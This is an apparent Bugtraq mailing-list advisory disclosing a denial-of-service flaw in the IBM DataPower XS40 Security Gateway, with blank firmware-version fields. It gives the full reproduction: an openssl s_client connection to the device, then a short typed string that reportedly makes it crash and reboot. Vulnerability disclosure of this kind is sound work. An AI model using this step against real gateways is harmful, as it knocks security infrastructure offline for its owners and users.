[IBM Datapower XS40] Denial of Service

From: erik@psafe.nl
To: bugtraq@securityfocus.com
Subject: [IBM Datapower XS40] Denial of Service

It appears it is possible to crash the IBM DataPower XS40 Security Gateway device by sending a simple (random?) string to it over an established SSL connection. The device reboots as a response to the input.

Tested vulnerable firmware is
Issue fixed as tested in

Tested as follows (entered attack-string is abc in this case):
openssl s_client -connect [IP]:[port]
Loading 'screen' into random state - done
abc [enter][enter]


After this, the device crashes and reboots.
